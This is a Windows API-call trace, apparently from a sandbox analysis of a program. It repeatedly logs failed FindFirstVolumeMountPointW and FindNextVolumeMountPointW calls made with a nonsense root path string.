[0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.565] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.565] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.566] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.566] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.567] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.567] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.568] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.568] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.569] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.569] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.569] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.569] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.569] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.569] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.569] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.570] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.570] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.571] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.571] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.572] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.572] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] 